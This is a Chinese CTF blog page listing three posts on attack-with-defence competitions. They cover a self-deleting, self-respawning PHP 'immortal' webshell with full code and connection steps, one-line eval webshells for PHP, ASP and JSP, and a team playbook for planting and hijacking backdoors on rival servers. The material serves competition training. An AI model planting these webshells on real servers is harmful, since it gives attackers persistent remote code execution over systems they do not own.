首页
关于站长
vFREE&资源
vFREE&导航
vFREE&友人帐
留言区
推荐
自由公式CTF
轻简导航
vFREE&网盘
Search
1
传说中的Windows11初体验(附下载链接和检测工具)
5,180 阅读
2
他的更多信息😋
1,917 阅读
3
MySQL中常见的内些...啥
1,189 阅读
4
非常菜的一个批量布置waf脚本
1,035 阅读
5
初始化一个Git仓库
880 阅读
其他知识
Linux
Windows
MySQL
Git
WriteUp
ctfshow
bugku
bmzctf
其他WP
CTF
Web
Crypto
Misc
AWD
漏洞复现
工具
Typecho
登录
Search
标签搜索
ctf
mysql
CTF-AWD
BMZCTF-WP
brixelctf
Bugku
Windows11
windows
web
web漏洞
xxe
web安全
vFREE
累计撰写
76
篇文章
累计收到
779
条评论
首页
栏目
其他知识
Linux
Windows
MySQL
Git
WriteUp
ctfshow
bugku
bmzctf
其他WP
CTF
Web
Crypto
Misc
AWD
漏洞复现
工具
Typecho
页面
关于站长
vFREE&资源
vFREE&导航
vFREE&友人帐
留言区
推荐
自由公式CTF
轻简导航
vFREE&网盘
搜索到
3
篇与
的结果
2021-03-31
不死马的原理和利用
黄沙百战穿金甲,不破楼兰终不还。——王昌龄《从军行》 何谓不死马,顾名思义就是不死,不死马广泛应用与AWD中或者其他的维持权限的手法中,不死马简直就是一句话木马的升级版本,一句话木马和不死马相比较起来,安全性做的很GOOD!!!在以往的一句话木马中,密码简单方便呈现给了用户,如果在AWD中,知道了密码的话,就可以反手打一波其他的主机,因为如果是被批量种马的话,所有人都一样,这也就是"骑马",在很多场比赛中,我的队伍(自由公式)都是利用一句话木马去反打其他的队伍一波 不死马原型 <?php ignore_user_abort(true); set_time_limit(0); @unlink(__FILE__); $file = '.ZYGS.php'; $code = '<?php if(md5($_GET["zygs"])=="e10adc3949ba59abbe56e057f20f883e"){@eval($_POST["ZYGS"]);}?>'; while (1){ file_put_contents($file,$code); usleep(5000); } ?> 解析ignore_user_abort(true); //设置与远程客户端断开后是否继续执行脚本,true即不断开set_time_limit(0); //设置脚本最大的执行时间,0即没有时间限制@unlink(__FILE__); //删除文件本身$file = '.ZYGS.php'; //文件名是.ZYGS.php$code = <?php ?>; //php代码file_get_contents($file,$code); //打开$file文件,然后写入$codeusleep(5000); //每隔usleep(5000)写入一个新文件 unlink就是为了删除传入的不死马文件,避免一些不必要的信息泄露出去,$file中可以规定你要不断生成的文件名,usleep(time)是生成木马的时间,这也是不死马的灵魂之一,通过不断生成文件在当前目录下,形成了不死马,不死马是一个进程,所以往往要重启主机或重启服务才能kill掉,当然,也可以条件竞争 <?php if(md5($_GET["zygs"])=="e10adc3949ba59abbe56e057f20f883e"){@eval($_POST["ZYGS"]);}?> 这段代码是为了防止骑马(乌鸦坐飞机),通过判断用户传入的变量,然后转换成md5值和e10adc3949ba59abbe56e057f20f883e进行对比,如果e10adc3949ba59abbe56e057f20f883e解密出来的值和用户传入的值是一样的话,就继续执行@eval($_POST['ZYGS']),这也是整个不死马中的灵魂,就是为了防止乌鸦坐飞机,一个人拿分(e10adc3949ba59abbe56e057f20f883e == 123456) "食"用方法服务器IP:123.321.123.321文件名:.zygs.php路径:123.321.123.321/upload/ 当不死马成功上传到服务器之后,访问文件路径 123.321.123.321/upload/.zygs.php,此时已经开始生成不死马.ZYGS.php了,并且传入的.zygs.php已经被unlink删除然后打开蚁剑,输入123.321.123.321/upload/.ZYGS.php?zygs=123456,密码就是ZYGS,直接连接就完事了 为了防止乌鸦坐飞机,md5值可以用一些在线网站破解不出来的明文比如说:qwefgh == bad6f5e2b87ed9ff582334de61f17312wellmd5 == 10bfc254c3d93fc3761f51ba40f8d4b9......$file后面的值设置成你要生成的文件名,连接也是用这个文件名字,就好像是.ZYGS.php 经过md5值的加密,以及不断生成木马文件,便成为了维持权限的好物,在bugku的AWD中,给种下不死马的话,要么重启服务,要么重启机器,要么进行条件竞争,再要么就去kill进程,重启服务再bugku的AWD中不太现实,毕竟没有权限,重启机器还是可以的,100分一次,条件竞争的话,还没有试过,也不知道不死马隔多久生成一个,kill进程的话,kill不完的 注:部分图片源自于网络,如有侵权,请联系删除!!!谢谢
2021年03月31日
524 阅读
0 评论
1 点赞
2021-03-28
一句话木马原理及利用
故事的开头总是这样,适逢其会,猝不及防。故事的结局总是这样,花开两朵,天各一方。 --每日网抑云 何谓一句话木马在渗透测试或者awd中,一句话木马都发挥着可大可小的作用,大到可能有些管理员会用一句话木马配合蚁剑来管理网站,当然,这种一句话木马肯定不是普通的一句话木马,小到在awd或者ctf比赛中用来维持权限,在比赛中如果挖掘到漏洞,自己修复好之后,反手利用一波,当然也不能保证利用过一次之后可以一直利用,如果被修复了,那这分数就拿不持久了,所以再利用漏洞的同时,也要尽快传一个木马维持权限,无论是PHP,ASP,JSP常见后缀名的木马PHP:<?php @eval($_POST['passwd']);?>ASP:<%eval request ('passwd')%>JSP:<%@ Page Language="Jscript"%><%eval(Request.Item["passwd"],"unsafe");%>利用木马的条件1.上传的木马成功上传,未被查杀2.知道上传的文件路径以及文件名3.上传的木马最终可以正常运行 基础原理<?php @eval($_POST['passwd']);?>@:隐藏错误信息,可有可无,但是最好有eval:将传入的字符作为php代码执行$_POST:POST的方式传入数据passwd:连接密码连接当木马上传成功后,路径一般会回显出来,比如说../upload/xxx.php如果给出了路径和文件名+路径那就好办了,上一句话木马或者蚁剑,URL就是URL/upload/xxx.php填完密码之后,就可以连接了,nice!!!但是现在想传马也不是百分百一传一个准的,也要配合多种绕过方式啥的
2021年03月28日
316 阅读
1 评论
0 点赞
2021-03-20
Bugku-AWD初级起手式(公开)
故事发生在别人身上是故事,发生在自己身上,就是命运了,能原谅的,不说原谅也会原谅,不能原谅的,说了原谅也不会原谅。 --《于心有愧》 AWD,全称Attack With Defence,中文:攻防兼备,说白了就是攻击别人服务器的同时还要防御自身的服务器,攻击别人的服务器增分,被攻击则扣分,AWD一般设于CTF竞赛中的第二阶段,根据非官方合作伙伴提供的资料中显示:AWD其主要特点为:强调实战性、实时性、对抗性,综合考量竞赛队的渗透能力和防护能力。本文围绕着bugku线上的AWD写,线下的还没参加过,没法写 bugku中线上的AWD,一般都是以cms为考点,考察一些cms有漏洞的版本(据说后面有pwn),bugku一只队里最多只能有三个人参加,所以建议可以分配好各自的任务起手式①--查找工具:xftp / Winscp开局可以任意一名队友将代码备份下来,最重要有两个原因1.源码下载下来可以丢到D盾,安全狗或者seay源码审计系统等安全工具检查有没有木马或者敏感未过滤的函数文件,一些比赛环境中,出题方会在某个文件中放置木马所以就需要自己去下载整个网站,然后放到工具中去检查,如果有木马,删掉即可,然后反手利用一波,再写一个不死马维持权限,Nice!!!;常见的一句话木马格式2.当系统给攻破了rm -rf *之后,可以恢复,如果不恢复的话,给裁判机发现,会checkdown,按照bugku的checkdown扣分的话,一次100分;除了以上两个原因之外,负责这一块的同志还应该找出本次赛事用的是什么cms,有没有后台,有后台的话,密码是什么,这些都需要去找,有一些后台存在文件上传,SQL注入等等等等,这些都需要看使用的是什么后台,账号密码如果没有写在文件中的话,就要去数据库查看账号和密码,找到之后,登录后台修改密码,如果在后台找到了漏洞点,将自己的服务器修复之后,反手利用一波,能不能利用全靠别的队伍有没有改密码或者修复这个漏洞,这一步建议分配给队里其他的同志去利用,和起手式②一起去利用,然后负责起手式①地同志就可以安安静静审计代码了,有代码漏洞就及时提交给队友起手式②--防御工具:xshellxshell连接自己服务器之后,如果在起手式①找到了木马,则应该立刻cd到木马所在的目录,将木马删除,出题方给的环境都是一样的,所以这个时候,又可以有任意一名队友去写脚本利用这个木马去拿分,能不能抓得到别的队伍全靠别的队伍有没有删除这个木马,尽量可以写一个不死马进去,维持权限,后面就可以不断拿分了,当然,前提是别的队伍没有克制我方写入的不死马,当前期防御地差不多了,就可以把waf和文件监控给上了,为了防御 起手式③--攻击工具:漏洞利用通过起手式①和②已经知道已有的漏洞和cms,cms版本,木马之后,就应该去利用木马和找相关的漏洞并且利用,所以,在这一步也是很关键的,如果你比别的队伍先找到这一个漏洞,并且利用,在场上的得分是遥遥领先的,主要还是拼手速,拼脚本,手速快,有flag拿,手速慢虽然也有flag拿,但是排名是先到先得的,如果前面没有得到cms得到话,可以帮忙着手防御,到了比赛开始已经觉得防御好了,就可以开始利用木马或者漏洞如果前期啥也没有得到的话,防御地不够细致,给别的队伍写入了木马,那就可以骑马了,何谓骑马,就是利用别人写入的一句话木马,通过查看当前木马地路径和木马的密码,然后写一个脚本或者是一个个去利用,连接到别人同目录下的木马去获得flag得分,这就是骑马但是如果写入的是不死马的话,一般都是有加密的,如果加密,那就很难利用了,加密的密文类型常见的md5,sha等等等等,不常见的字符一般是无法解出来的,要去破解,等破解地来,都比完了,所以骑马要骑有明文密码地马,比如说:这样子的,密码就是password,有了明文密码,就开骑吧,不过,要是别的队伍没有种下这个马的话,其实也利用不了如何去找cms漏洞呢?如果知识储备不足的话或者没有自己的漏洞库的话,可以通过我的非官方合作伙伴去找漏洞,使用方法如下:非常地银杏!!!注:部分图片源自于网络,如有侵权,请联系删除,谢谢!!!
2021年03月20日
456 阅读
1 评论
3 点赞